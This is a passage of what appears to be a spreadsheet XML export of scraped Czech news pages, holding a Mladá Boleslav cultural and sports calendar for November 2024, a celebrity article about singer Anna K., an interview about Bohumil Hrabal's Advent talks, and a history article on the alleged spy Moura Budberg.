9–19leté) roh Čechovy a Havlíčkovy ulice Otvírací doba: po, út, st, čt 12:00–18:00 • St 6. 11. 16:30 KLUBOVÁ RADA. Skupinová práce s klienty. • St 13. 11. 16:00 BOWLING. Sportovní odpoledne s klienty. • St 20. 11. 16:00 BESEDA NA TÉMA: SOCIÁLNÍ SÍTĚ. Skupinová práce s klienty. • Po 25. 11. 16:00 FILMOVÝ KLUB. Promítání filmu s diskusí. • Čt 28. 11. 15:00 ZIMNÍ VÝZDOBA KLUBU. Kreativní odpoledne s klienty. . ŠKODA MUZEUM, V. Klementa 294 Tel.: 326 831 134–5, 326 832 038 muzeum@skoda-auto.cz, museum.skoda-auto.cz Otvírací doba: po–ne 9:00–17:00 Stálá expozice: • TRADICE, EVOLUCE, PRECIZNOST. • So 2. 11. 15:00 ŠTÍSTKO A POUPĚNKA: POJĎ SI HRÁT! • St 27. 11. 17:30 PRODEJ VOZŮ ŠKODA V ZÁPADNÍ EVROPĚ PO ROCE 1991. Přednáší: Luboš Vlček. • Čt 28. 11. 15:00 TVOŘENÍ ADVENTNÍCH VĚNCŮ. • Ne 1. 12. 17:00 MÁŠA A MEDVĚD. Výstavy: • Do ne 5. 1. 2025 60 LET VOZU ŠKODA 1000 MB. K vidění jsou sériová provedení i prototypy, soutěžní speciály, formule a nástupci vozu Škoda 1000 MB. VZDĚLÁVACÍ CENTRUM NA KARMELI Na Karmeli 1457, www.nakarmeli.cz • ČASOVÁ OSA. Na 20metrové časové ose se prolínají světové, české a boleslavské dějiny s historií Škoda Auto . Osa zachycuje období od 2000 př. n. l. až do současnosti. • Út 5. 11. 19:00 SEVERNÍ AMERIKOU VLASTNÍM VANEM. Přednáška Jindry a Daniela z Travelbeat, vstupné 120 Kč. • Út 12. 11. 19:00 POKLADY JANA ROSÁKA . Setkání s rozhlasovým a televizním moderátorem, příležitostným hercem, vstupné 280 Kč. • St 20. 11. 19:00 ALENA ZÁRYBNICKÁ : POČASÍ, LAVINY, POVODNĚ–BLÝSKÁ SE NA ČASY? Povídání o počasí, jeho extrémech, o předpovědích i o zákulisí televizního zpravodajství, vstupné 200 Kč. • Út 26. 11. 19:00 TANZÁNIE–NEJÚŽASNĚJŠÍ SAFARI. Přednáška Tomáše Kubeše, vstupné 120 Kč. SPORT Zimní stadion–lední hokej, www.bkboleslav.cz Tipsport extraliga • Pá 1. 11. 17:30 BK MB : HC DYNAMO PARDUBICE . • Pá 15. 11. 17:30 BK MB : BANES MOTOR ČESKÉ BUDĚJOVICE . • Ne 17. 11. 16:00 BK MB : HC VÍTKOVICE RIDERA. • Pá 22. 11. 17:30 BK MB : HC SPARTA PRAHA . • Ne 24. 11. 16:00 BK MB : HC VERVA LITVÍNOV. • Ne 1. 12. 16:00 BK MB : HC KOMETA BRNO. Městský stadion–fotbal, www.fkmb.cz Chance liga • Ne 10. 11. 15:30 FK MB : AC SPARTA PRAHA . • Ne 1. 12. 15:30 FK MB : FC HRADEC KRÁLOVÉ . • St 4. 12. 17:00 FK MB : FC SLOVAN LIBEREC . Konferenční liga • Čt 28. 11. 21:00 FK MB : REAL BETIS . Městská sportovní hala U Stadionu 1322 • So 2. 11. 22:00 MALIBU : ROUDNICE (futsal, muži). • Ne 3. 11. 16:30 FLORBAL MB : NOKIAN (Champions Cup, florbal, muži) • Pá 8. 11. 18:30 FLORBAL MB : LIBEREC (florbal, muži). • Ne 10. 11. 19:00 MALIBU : KADAŇ (futsal, muži). • So 16. 11. 11:00 MISTROVSTVÍ REPUBLIKY V BENČI. • Čt 21. 11. 18:00 FLORBAL MB : BOHEMIANS (florbal, muži). • So 23. 11. 18:30 FLORBAL MB : BULLDOGS (florbal, muži). • Ne 24. 11. 10:00 CZECH DANCE TOUR (taneční soutěž). • St 27. 11. 19:30 FLORBAL MB : PARDUBICE (florbal, muži). • So 30. 11. 17:00 ŠKO-ENERGO : ŽĎÁR (basketbal, ženy). • So 30. 11. 20:00 MALIBU : BENEŠOV (futsal, muži). PROGRAMY PRO SENIORY KC Klementinka • Každé pondělí 8:10–9:40 CVIČENÍ ČCHI-KUNG PRO SENIORY. Cvičebna. Tradiční čínské cvičení čchi-kung. Určeno pro ženy i muže nad 55 let. Vede lektorka Alena Drábová. Platba za zbývající část kurzu, lekce vychází na 100 Kč. • Každou středu 10:00–11:30 ESPERANTO. Jazykový kurz pod vedením esperantistky Jindřišky Drahotové , vhodné i pro úplné začátečníky. Zdarma. • Každý čtvrtek 9:00–10:00 TAI CHI. KC Klementinka. Cvičení vycházející z čínského bojového umění, k posílení zdraví a navrácení tělesné i duševní energie. Zdravotní sestava je vhodná pro každého nehledě na jeho věk. Nutná dřívější zkušenost s tai chi. Zdarma. Výlety–Senioři nejen sobě Přihlášky a veškeré další informace: Pavel Svoboda www.seniorinejensobe.cz, případně tel.: 702 051 284 • Út 26. 11. TERMÁLNÍ LÁZNĚ CIEPLICE, JELENIA GÓRA , POLSKO. Odjezd 5:30 z Mladé Boleslavi od DK. Cena dopravy 450 Kč. Podat přihlášku a zaplatit je možno každé po od 10:00 do 12:00 v salonku restaurace U Měšťáků v MB nebo e-mailem info@seniorinejensobe.cz. S.E.N. klub, Blahoslavova 187/ 9 sen@jbmb.cz, www.jbmb.cz • Každý čtvrtek 14:00–16:00 NEFORMÁLNÍ KLUB S.E.N. Pro všechny dříve narozené, co nechtějí být sami. Vstup zdarma, káva/čaj zajištěna, něco sladkého můžete vzít s sebou. Služby a školení MB, z. u. Mladoboleslavská univerzita 3. věku a volného času seniorů • 22. AKADEMICKÝ ROK 2024/2025 Mladoboleslavské univerzity třetího věku byl slavnostně zahájen dne 2. 10. ve Sboru českých bratří. Druhý týden v říjnu univerzita otevřela 11 studijních oborů. Každý studijní obor obsahuje 27 až 28 zpravidla devadesátiminutových </t>
  </si>
  <si>
    <t>41150</t>
  </si>
  <si>
    <t>20241101_472_3241215251_72f0dd0e1eb0522bde4f.html</t>
  </si>
  <si>
    <t>72f0dd0e1eb0522bde4f</t>
  </si>
  <si>
    <t>Zpěvačka Anna K.: Pomoc psychologa po krachu vztahu</t>
  </si>
  <si>
    <t>Zpěvačka Anna K.: Pomoc psychologa po krachu vztahu Zpěvačka Anna K. (59) se až nyní, po pěti měsících, začíná pomalu vzpamatovávat z nečekaného rozchodu se svým životním partnerem Tomášem Varteckým (54). Jak ovšem přiznala, sama by to nezvládla, a musela proto vyhledat pomoc psychologa! Na letošní rok plánovali svatbu, místo toho přišel rozchod. Anna K. a muzikant Tomáš Vartecký se rozešli po dlouhých 27 letech vztahu, a zatímco Vartecký si našel obratem náhradu, a stihl se dokonce už i oženit, zpěvačka se netají tím, že se z rozchodu ještě pořádně nevzpamatovala. Na začátku října proto odletěla na dovolenou do Turecka , aby si dopřála trochu klidu. „Bylo to krásných deset dnů. Četla jsem si konečně knížky, což se mi dlouho nedělo, protože můj mozek se nedokázal vůbec soustředit,“ vysvětlila pro Super.cz. „Plavala jsem v nádherném moři, zdravě jedla... Vracím se do zdravého režimu, cvičím s osobní trenérkou, která za mnou jezdí. Ta mě pořád strašně chválí, což mě samozřejmě motivuje,“ přiznala. Aby ale mohla Anna K. začít nový život se vším všudy a správně zpracovat situaci, která ji srazila na kolena, musela vyhledat pomoc psychologů. „Starám se i o své duševní zdraví s odborníky, protože to je taky cesta ke zdraví, a není nutné říkat si, že vše zvládne člověk sám,“ uvědomuje si zpěvačka. „Někdy to totiž možné není, a když vám někdo, kdo má na to seriózní vzdělání, pomůže, jde to vše o moc lépe. Když máte zlomenou nohu, musíte taky k doktorovi a se zlomeným srdcem je to stejný,“ má jasno. Neustálé kolísání mezi štěstím a zoufalstvím bere Anna K. už pomalu jako běžnou součást svého života. „Já jsem holt asi mezi těma vyvolenýma, který, když si chvíli užívají na světle, padne na ně zase za chvíli pořádnej stín. Ale vlastně jsem zvládla už tolik překážek a těžších úkolů, takže určitě dám i tohle,“ naráží zpěvačka na to, že už v životě překonala hned několik těžkostí. Dvakrát porazila rakovinu, která jí v minulosti vzala několik členů rodiny i blízkých přátel, celou dobu ji však držel nad vodou právě její partner Tomáš. O to těžší byla pro zpěvačku jeho ztráta. „Bude asi potřeba hodně trpělivosti a já to slovo už úplně nesnáším, protože ho poslouchám pořád. Musíš být trpělivá, chce to čas atd. Ale tak jdu prostě do toho,“ vzkazuje odhodlaně. Zpěvačka Anna K.: Pomoc psychologa po krachu vztahu Anna K. Tomáš Vartecký a jeho nová přítelkyně Martina Anna K. a Tomáš Vartecký Anna K. na cenách Anděl Anna K. v prázdném letadle Anna K. v prázdném letadle pouze s posádkou Spolucestující Anny K. - Hana Petřinová Anna K. a Tomáš Vartecký v roce 2004 Vartecký v roce 2007 Tomáš Vartecký s Annou K. Kurtizány z 25. avenue - z původní kapely už zůstal jen Tomáš Vartecký, zbytek kumpánů vyměnil. Tomáš Vartecký a Anna K. Tomáš Vartecký se oženil. Tomáš Vartecký s partnerkou Martinou v půlce srpna na Zbraslavi První pivo padlo už před devátou ráno... Druhé následovalo hned poté Tomáš Vartecký Tomáš Vartecký a skupina Lucie v roce 2003 Anna K. a Tomáš Vartecký na cenách Anděl Anna K. se na cenách Anděl dobře bavila. Tomáš Vartecký na cenách Anděl Luciana Krecarová (Anna K.) a Tomáš Vartecký Anna K. s partnerem Tomášem Varteckým Anna K. a Marek Hrstka ve StarDance Anna K. a Marek Hrstka ve Stardance Zpěvačka Anna K. si prošla peklem v podobě rakoviny, ale díky StarDance má opět důvod k úsměvu. Tancem ve StarDance Anna K. dobíjí energii. Anna K a Tomáš Vartecký Anna K nechyběla na tradičním nohejbalovém turnaji rockerů Festonda. Anna K si vše fotila na svůj mobil. Tomáš Vartecký hrál za ‚ďábelský podzim'. Autor: mia Autor person mia Rubrika transition_slide České celebrity</t>
  </si>
  <si>
    <t>20241101_473_3241208579_3008cfdb0107bcb2fb45.html</t>
  </si>
  <si>
    <t>3008cfdb0107bcb2fb45</t>
  </si>
  <si>
    <t>Rodiče mi podstrčili ohmatané Hrabalovy knihy. A já vzplál jako suchá stodola</t>
  </si>
  <si>
    <t>Rodiče mi podstrčili ohmatané Hrabalovy knihy. A já vzplál jako suchá stodola Začněme rovnou nahrávkami Hrabalových adventních promluv. Pocházejí z počátku 80. let, Bohumil Hrabal už byl tehdy starší pán, narodil se v roce 1914. Promluvy pronesl v libickém evangelickém sboru. Jak jste se k jejich nahrávkám vlastně dostal? Byla to magická chvíle – jako z nějaké Hrabalovy povídky. Byl jsem pozván na literární posezení k Josefu Kroutvorovi , Hrabalovu příteli. Byl tam také badatel Tomáš Mazal , rovněž velký znalec jeho díla, a básník Miloš Doležal . Bavili jsme se o duchovním rozměru Hrabalova myšlení. A Tomáš se zmínil, že Hrabal kdysi promlouval na nějaké faře v Libici . Vydal jsem se po této stopě a přes paní farářku a farní kroniku zjistil, že jeho návštěv bylo za šest let minimálně jedenáct. Všechny dochované nahrávky pocházejí z Hrabalových pravidelných návštěv v době adventu, celkem sedm audiokazet. Podařilo se mi vypátrat pana Jiřího Hofmana z Aše, který promluvy natáčel. Je na kazetách slyšet i to, jak na Hrabalova slova reagovali přítomní posluchači? Je slyšet, že se cítí dobře. Nejen farníci, ale i pozvaní hosté. Zároveň se tehdy všichni báli, aby se to moc nerozkřiklo a nepřilákalo to pozornost StB . Pan farář vždy pečlivě zaznamenával počet účastníků a vždy to bylo jen okolo třiceti lidí. Už jste říkal, že Hrabal přijel za šest let minimálně jedenáctkrát. Ví se, jestli StB někdy setkání opravdu narušila? Ne. Podle některých pamětníků je ale možné, že Hrabalovy návštěvy ustaly nejen kvůli zhoršujícímu se zdraví, ale právě i kvůli obavám z potíží. Místní se ho během setkání ptali na všechno možné, Hrabal měl přátele v emigraci, mluvil otevřeně o Milanu Kunderovi nebo o Jaroslavu Seifertovi , který tou dobou dostal Nobelovu cenu za literaturu, ale v Československu byl v nemilosti. Většina lidí Bohumila Hrabala vnímá jako pijáka piva a pověstného pábitele, hlavně skrze kultovní Menzelovy filmy. Nález nahrávek ale vrhl na jeho tvorbu nové světlo. Vy sám jste na jejich základě vydal knihu Evangelium podle Bohumila Hrabala , která vykládá duchovní rozměr spisovatelovy tvorby. Povězte, jaké je tedy Hrabalovo „evangelium“? Slovo evangelium je třeba brát spíš jako metaforu, kdyby chtěl být Hrabal považován za křesťanského spisovatele, býval by to řekl. On se zajímal o všechny duchovní tradice a věřil, že dějiny lidstva se vyznačují kontinuitou. Zajímalo ho všechno hluboké, pravdivé a moudré, co lidé v celých kulturních dějinách objevili. I tak ale byla role křesťanství v jeho životě stěžejní, když se podíváme do rejstříku Hrabalova díla, nejčastěji zmiňovanou osobou je Ježíš Kristus . O jeho příběhu Hrabal meditoval celý život, Kristův úděl vnímal jako archetypální vzorec. „Jeho“ Ježíš bydlel v Libni a jezdil za maminkou do Polabí , měl otčíma, který spravoval stará auta. Hrabal viděl „kristovské“ rysy třeba ve svém příteli Vladimíru Boudníkovi (malíři a grafikovi – pozn. red.) , v prokletých básnících a dalších umělcích. eyJ0aXRsZSI6IlBcdTAxNTllXHUwMTBkdFx1MDExYnRlIHNpIHRha1x1MDBlOSIsImFydGljbGVzIjpbNzcwNDVdfQ== Katapult do jiného vesmíru Kdy jste si vy osobně Bohumila Hrabala zamiloval? Byl jsem jeho oddaným učedníkem po většinu dospívání. Prožil jsem hrabalovské mládí, lásku k němu jsem získal v šestnácti letech od rodičů, kteří mi „podstrčili“ své ohmatané knihy a já vzplál jako suchá stodola – katapultovalo mě to do jiného vesmíru, do netušeného pohledu na skutečnost. Když jsem pak jel za příbuznými do Nymburka , kde Hrabal strávil mládí, po těchto iniciačních literárních zážitcích jsem město viděl úplně jinak. Později taky Libeň a Kersko. Ale ještě větší tanec nastal, když jsem „jeho“ očima uviděl i místa, o kterých vůbec nepíše. Menzel tomu říkal „nalézání zázraků uprostřed všedního dne“. Když se ještě na chvilku vrátíme k oněm nahrávkám adventních promluv… V už zmíněné knize Evangelium podle Bohumila Hrabala se vyznáváte, jak jejich objev změnil váš pohled na svět i na to, co svět přesahuje. V jakém smyslu? Opravdu mě překvapilo, jak originálně a poctivě Hrabal promýšlí otázky, nad nimiž lidé, věřící i nevěřící, nepřemýšlejí. Hrabal stojí na rozhraní, ještě jako 70letý pán není s tázáním před tváří věčnosti hotov. Měl zkušenost s drsným životem; jako doktor práv se desítky let živil manuální prací na kladenských hutích nebo ve sběrných surovinách. Zároveň sledoval dějiny umění a filozofie a jako častý host pražských hospod vedl zanícené hovory s Egonem Bondym a dalšími filozofy. Celé noci mudroval o Heideggerovi, Jaspersovi, Schopenhauerovi. V libických promluvách Hrabala sledujeme v syrovější podobě. Netvoří košatá souvětí, ale zapojuje se do neformálních rozhovorů, občas přihodí vtípek. Jeho psané úvahy o smyslu života četly statisíce čtenářů, ale tam, u čaje a cukroví, ho slyšíme, jak ten smysl života doslova nahmatává. Máte nějaký konkrétní moment, který vás nejvíc oslovil? Teprve opakovaným poslechem mi došlo, že v Hrabalově celoživotním promýšlení lidské existence je hluboká souvislost. Pospojovaly se mi momenty z Příliš hlučné samoty, z Obsluhoval jsem anglického krále nebo z Tanečních hodin pro starší a pokročilé. Jeho uvažování o „perličce na dně“, božském klenotu v hloubi lidské duše, není jen literární ornament. Hrabal je přesvědčený, že tato „božská jiskra“ v duši se třpytí, když člověk tvoří a miluje. Tvorba a láska k bližnímu jsou pro něj dvě zázračné kvality ve všech lidech – od velkých umělců až po prodavačky, uklízečky, zedníky a ševce. Umělecký pohled na skutečnost má podle něj na dosah každý. Člověk tvoří tím, že se dívá na svět zamilovanýma očima. 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 Láska ke strýci Pepinovi Hrabal byl původně bohatý synek, ale pohodlný život odmítl, protože „nechtěl být konzumní“. Kde se to v něm vzalo? Hrabal (v mládí) patřil k nymburské smetánce, ale cítil se provinile. Nejlepší kamarády měl mezi kluky, kteří chodili bosí. Období, kdy nosil obleky na míru, klobouky z pražských salonů, hrál tenis a chodil na taneční zábavy, mu připadalo trapné. Souvisí to s jeho niternou proměnou mimo jiné v důsledku toho, co viděl jako výpravčí v Kostomlatech za války. Vlaky plné umírajících vojáků. Byl otřesen. Po válce už nechtěl žít jako dřív. Navíc měl odjakživa pozorovatelský a naslouchající naturel. V nymburském pivovaru ho fascinovali sladovníci, drsní potetovaní chlapi, ale on měl chuť zapisovat si každou jejich větu jako životní moudro. Neustále se svým okolím „splýval“, jak říkal, nasával atmosféru prostředí. Mezi obyčejnými lidmi se choval plebejsky a cítil se dobře. Brali ho i Romové, které miloval. Připomeňme, že Bohumil Hrabal psal roky do šuplíku, debutoval v téměř padesáti a psaním se začal živit až před důchodem. Musel dělat ústupky režimu… Těsně po válce plál nadšením pro velké francouzské básníky, vesměs levicově zaměřené. Přihlásil se do KSČ , členem byl několik měsíců. Po velkém vystřízlivění vystoupil korespondenčním lístkem – napsal, že tytéž důvody, které ho vedly ke vstupu, ho nyní vedou zase k vystoupení. Být „bývalý komunista“ bylo mnohem horší, než kdyby jím nikdy nebyl. Po většinu předlistopadového režimu byl persona non grata. V období tání 60. let vydal v rychlém sledu asi deset knih, ale po roce 1968 zase upadl v nemilost. Na známém rozhovoru pro časopis Tvorba z roku 1975 je pikantní pouze to, že text byl redakčně doupraven, aby byl náležitě smírný – a Hrabal neprotestoval, čímž rozhněval disidenty. Rozhodně se z něj ale nestal režimní spisovatel. Texty, na kterých mu nejvíc záleželo, mu stejně nevydali. Rozumí Hrabalovi dnešní čtenáři? Třeba v Maďarsku ho považují za „jednoho z největších maďarských spisovatelů“! Potvrdí to i pan vrchní U Zlatého tygra, v Hrabalově kultovní hospodě – že tam Maďaři jezdí, celé autobusy. A podobně Poláci, kteří ho vnímají v kontinuitě s Haškem a Kafkou a také jako toho, kdo vyjadřuje typicky českou a zároveň středoevropskou mentalitu. Ale čtou ho ve velkém i Japonci, Francouzi, Italové, nemluvě o Němcích a Britech. Je jedním ze tří nejpřekládanějších českých spisovatelů. A co mladí? Mládež těžko hledá k Hrabalovi cestu možná i vinou syndromu povinné četby. A možná jim ani nerezonuje s vlastní zkušeností. My jsme se v něm poznávali. Prvním blýskáním na časy a možná i novou vlnou zájmu o Hrabala je ale množství a povaha kulturních událostí k letošnímu výročí – byly početnější, významnější a více navštěvované, než když měl sté jubileum. Jak byste dnes lidi pro Hrabala nadchl? Vedle lásky k Hrabalovi planu láskou ke strýci Pepinovi, jeho múze. Nedám dopustit na Taneční hodiny pro starší a pokročilé – neskutečná jedna věta, která má víc než osmdesát stran! Je to jurodivý tanec. Gejzír pábitelství. Iniciační text. Jedna z mála knih, u které opakovaně slzím smíchy. Bez strýce Pepina by nebylo Hrabala. Říká o něm, že to byl jeho „skutečnej otec“, a jak stárnul, říkal, že se jím stává čím dál víc. Podle Hrabala bylo natočeno devět filmů, dva další jsou těsně před dokončením – letos mají být uvedeny Harlekýnovy miliony, což je o jeho mamince, ohlížející se za životem, a Krasosmutnění, pokračování Postřižin. Koncem roku bude mít premiéru dokument České televize, vyjde také obsáhlá kniha z letošní mezinárodní hrabalovské konference v Nymburce . A letos byla též otevřena jeho chata jako hausmuzeum. To vše je svědectví o tom, že s ním ještě zdaleka nejsme hotoví. Autor: Tereza Zavadilová Autor person Tereza Zavadilová Rubrika transition_slide Lidé</t>
  </si>
  <si>
    <t>3950</t>
  </si>
  <si>
    <t>8880</t>
  </si>
  <si>
    <t>20241101_474_3241254071_2c4fa105147d33172d87.html</t>
  </si>
  <si>
    <t>2c4fa105147d33172d87</t>
  </si>
  <si>
    <t>Aby se dostala z Lubjanky, nabídla tělo Jagodovi. Život špionky zakryla legenda</t>
  </si>
  <si>
    <t>Aby se dostala z Lubjanky , nabídla tělo Jagodovi. Život špionky zakryla legenda Slavný spisovatel Graham Greene vzpomínal ve svých pamětech Úniky, že při svém pobytu v estonské metropoli Tallin v roce 1934 „marně hledal bordel“, který mu prý v Londýně doporučila jeho „velmi nebezpečná známá“, rusko-pobaltská exulantka Maria Ignatievna Zakrevskaja a někdejší hraběnka Benckendorffová a baronka Budbergová, přáteli oslovovaná jako Moura. Greene jí popisované místo nenašel, protože tam, kde mělo být, se místo nevěstince nacházela lékárna. Svět Tato jednoduchá zkazka ve skutečnosti o Mouře Budbergové hodně vypovídá: jak vypovídají prakticky všichni její životopisci i mnozí slavní muži, s nimiž se dostala do velmi úzkého, často i intimního kontaktu, je velmi těžké odhalit a popsat její skutečný životní příběh, protože si dost vymýšlela a sama o sobě vytvořila několik propracovaných autobiografických fikcí. Anglický novinář a spisovatel Ian Thompson ji na stránkách britského titulu The Guardian označil za „aristokratickou špionku a pozoruhodnou lhářku“. close info Zdroj: Wikimedia Commons, Allan Warren, CC BY-SA 3.0 zoom_in Moura Budbergová, celým jménem Maria Ignatievna von Budberg-Bönninghausenová, známá také jako hraběnka von Benckendorffová nebo baronka von Budbergová, ve svém londýnském bytě Zavražděný manžel Narodila se v roce 1892 do aristokratické ukrajinské rodiny a už jako velmi mladá se bohatě provdala. „Její otec Ignatij Platonovič Zakrevskij byl ruským senátorem z vyšší třídy, který vlastnil na Ukrajině půdu. Svou chytrou dceru povzbuzoval, aby se naučila anglicky, italsky, německy a francouzsky, a v jejích 18 letech ji provdal za estonského hraběte Johanna von Benckendorffa,“ píše David Bingham na blogu The London Dead . Podle jiných zdrojů byl Benckendorff ve skutečnosti pobaltský Němec, který měl v Estonsku své panství. Ani majetek, ani mladá a půvabná žena mu ale štěstí nepřinesly – o pár let později byl během bolševické revoluce za nejasných okolností zavražděn. Česko „Autoři příjemně senzacechtivé Mouřiny biografie nazvané Velmi nebezpečná žena naznačují, že Moura měla na této vraždě podíl, ale nepředkládají žádný důkaz, který by toto tvrzení podpořil,“ uvádí Thompson . Podle Binghama byla skutečnost podstatně prozaičtější: Benckendorffa podle něj zastřelil jeden z rolníků pracujících na jeho panství, což bohužel patřilo „ke koloritu té doby“. Vynucený sex s Jagodou? Mladá vdova se nicméně ocitla v centru pozornosti vyšetřovatelů a v roce 1919 skončila v nechvalně známém moskevském vězení Lubjanka , ovšem nikoli kvůli vraždě svého manžela (ta k ní možná jen upoutala pozornost tajné služby), ale kvůli podezření ze špionáže ve prospěch Britů. Ještě před Říjnovou revolucí v roce 1917 se totiž na ruské ambasádě v Berlíně seznámila s britským diplomatem R. H. Brucem Lockhartem . Když byl její manžel zavražděn, napadlo bolševické úřady, že to může vzájemně souviset, a půvabná mladá žena putovala do podzemní vězeňské kobky. Lockhart se za ni u ruské vlády pokusil intervenovat, ale byl na několik týdnů zadržen také. | Video: Youtube Následuje další ne zcela potvrzená peripetie z pozoruhodného hraběnčina života. „Legenda tvrdí, že Moura si zajistila vlastní propuštění z Lubjanky tím, že veliteli nabídla sex. Ať už byla pravda jakákoli, mohla nosit Bruci Lockhartovi jídlo a knihy, dokud nebyl vyměněn za sovětského agenta zadržovaného Brity,“ píše Jonathan Calder na stránkách titulu The New Statesman . Mladá žena si podle všeho „koupila“ vynuceným sexem s nějakým vysoce postaveným sovětským funkcionářem lepší zacházení a určitou volnost pohybu v rámci Lubjanky , na svobodu se však dostala až poté, co byl Lockhart konečně propuštěn a vyhoštěn z Ruska – a i potom to byla svoboda s výhradou, protože zřejmě musela podepsat spolupráci neblaze proslulé „Čece“ (Črezvyčajnoj komissiji neboli Mimořádné komisi), tedy zpravodajské službě bolševického Ruska . Svět Což nás přivádí k dalšímu zajímavému drbu z Mouřina života, a sice ke jménu onoho sovětského funkcionáře; podle Caldera šlo o nejmenovaného „velitele“, ale Bingham jde dál a tvrdí, že to nebyl nikdo jiný než sám Genrich Grigorijevič Jagoda, později všemocný šéf NKVD a začátkem 20. let vedoucí zvláštního oddělení a člen prezidia Čeky. Po propuštění na podmíněnou svobodu se žena opět potkala s Lockhartem, navázala s ním milostný vztah a prý i čekala jeho dítě, ale potratila – současně však na svého milého psala nucená hlášení předávaná Rusům. close info Zdroj: Wikimedia Commons, Elmer Fryer (1898-1944), volné dílo zoom_in Roli špionky Eleny Moura ztvárnila ve filmu Britský agent Kay Francisová Britský diplomat tuto historii později zbeletrizoval ve své knize Paměti britského agenta z roku 1932, kterou o dva roky později zfilmoval pod názvem Britský agent režisér Michael Curtiz , dodnes slavný díky legendární Casablance . Bruce Lockharta hrál v Britském agentovi Leslie Howard , tajemnou a vášnivou „Elenu Mouru“, jejíž předlohou byla zcela nepochybně Moura Benckendorffová, ztvárnila Kay Francisová. Z hraběnky baronkou Brzy poté, co za ne zcela jasných okolností unikla z Lubjanky , se mladá žena vdávala znovu. I tentokrát se stal jejím vyvoleným šlechtic z Estonska , konkrétně baron Nikolaj Budberg. Z hraběnky Benckendorffové se tak stala baronkou Budbergovou, což bylo jméno i titul, které si podržela, i když ze strany barona šlo zřejmě jen o přátelskou službu, jež pomohla Mouře získat pas a opustit Rusko . Poměrně rychle se pak rozvedli a Budberg zmizel z jejího života. Svět V té době už ji měla v hledáčku nejen Čeka, ale i britská MI5. „Vzhledem ke svým nejasným politickým a morálním postojům mohla Moura působit jako dvojitý agent. Pracovala jako překladatelka v propagandistickém oddělení britského velvyslanectví v Tallinu a přitom mohla s machiavelistickou obratností infiltrovat i bolševickou špičku v Petrohradě (pozdějším Leningradu ),“ domnívá se Thompson . Tallin, jenž byl z pobaltských neruských přístavů k Petrohradu nejblíž, byl v té době znám jako centrum špionáže prováděné zejména někdejšími „bělogvardějci“, tedy důstojníky někdejší carské armády v emigraci, kteří chtěli zabránit případné sovětské anexi Pobaltí . Není vyloučené, že s nimi sympatizovala i Moura – stejně jako nelze úplně pominout možnost, že mezi nimi získávala informace, jež poskytovala bolševikům. „ Graham Greene nebyl jediný, kdo v ní viděl svůdně nejednoznačnou postavu,“ glosuje to Thompson . Milenkou světových spisovatelů Podnikavá, společenská a inteligentní mladá žena měla v průběhu 20. let minulého století i další zajímavé známosti. Přes ruského básníka Korneje Ivanoviče Čukovského se seznámila se slavným ruským spisovatelem Maximem Gorkým , pobývajícím tehdy v Itálii , a třebaže byl o generaci starší, začala s ním žít a nakonec strávila v jeho domě coby „neoficiální manželka“ s přestávkami více než 10 let. Svět Gorkij ovšem nebyl jediný její milenec – románek prožila také se slavným britským spisovatelem Herbertem Georgem Wellsem , s nímž se seznámila při jeho návštěvě Moskvy v roce 1920, zřejmě tedy těsně po svém propuštění z vězení. Začátkem 30. let se Gorkij vrátil z Itálie , kde se mezitím dostali k moci fašisté pod vedením Benita Mussoliniho , zpátky do Ruska a Moura se přestěhovala do Londýna . Tam ji znovu vyhledal H. G. Wells , který jí opakovaně nabízel sňatek, ale odmítla ho. close info Zdroj: Wikimedia Commons, George Charles Beresford, volné dílo zoom_in Slavný britský spisovatel H. G. Wells na snímku z roku 1920. Právě v tom roce se při své návštěvě Moskvy seznámil i s Budbergovou a stali se z nich milenci Odmítla i jeho nabídku doprovázet jej do Sovětského svazu při jeho další cestě v roce 1934 (jejím účelem bylo velké interview se sovětským vůdcem Josifem Vissarionovičem Stalinem, jež Wells v Kremlu opravdu pořídil), protože se bála, že bude v Rusku zatčena. Věčně podezřelá Známost s Wellsem jí nicméně pomohla proniknout mezi londýnskou literární a kulturní smetánku, kde se navíc uplatnila jako překladatelka a konzultantka divadelních a filmových produkcí. Neustále však byla pod dohledem MI5, jež ji podezřívala ze špionáže pro Rusko . Dodnes není jisté, zda se Moura dokázala ze svého dávného závazku vůči sovětské tajné službě vyvázat, nebo zda od ní putovaly nějaké informace do Ruska . Vyloučené to není – mezi její londýnské přátele patřil třeba britský diplomat Guy Burgess , což byl skutečně sovětský agent, člen špionážní skupiny Cambridge Five fungující od poloviny 30. let do prvních let éry studené války, který v roce 1951 zběhl do Sovětského svazu . Ačkoli Mouře samotné nikdo špionáž ve prospěch Sovětů neprokázal, její rozporuplná pověst jí vynesla přezdívku „ Mata Hari Ruska “. close info Zdroj: Wikimedia Commons, United Press International , volné dílo zoom_in V Londýně se Moura seznámila i s britským diplomatem a sovětským špionem Guyem Burgessem , což jí vyneslo trvalý zájem britské tajné služby MI5 Po druhé světové válce se začala věnovat literární činnosti, napsala několik knih, přeložila do angličtiny Gorkého román Život zbytečného člověka a napsala scénáře nejméně dvou celovečerních filmů: snímku Tři sestry, zrežírovaného v roce 1970 Lawrencem Olivierem, a filmu Racek, který v roce 1968 natočil Sidney Lumet . Poslední roky svého života však trávila zejména v oparu tvrdého alkoholu , v jehož konzumaci prý byla nezdolná. „Dokáže vypít úžasné množství, většinou ginu,“ stálo o ní v jednom hlášení MI5. Její přátelé z uměleckého světa ji však i tak navštěvovali v jejím luxusním bytě v Cromwellově ulici nebo v její rezidenci v Ennismorských zahradách. Na samém sklonku života se vrátila do Itálie a 1. listopadu 1974 zemřela v toskánské obci Terranuova Bracciolini, jejíž panorama si zamilovala. Autor: Jaroslav Krupka Autor Jaroslav Krupka</t>
  </si>
  <si>
    <t>20241101_475_3241489675_a853b645ae943ec8f597.html</t>
  </si>
  <si>
    <t>a853b645ae943ec8f597</t>
  </si>
  <si>
    <t>Denní horoskop na 1.11. 2024: Blíženci mohou vyhrát v loterii, Berani se mohou rozhodnout pro nové začátky</t>
  </si>
  <si>
